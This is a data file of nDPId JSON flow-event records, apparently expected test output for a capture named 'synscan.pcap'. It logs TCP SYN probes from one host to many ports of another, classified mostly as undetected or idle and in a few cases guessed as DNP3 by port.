-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1007,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1839,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5679,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7741,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7741,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
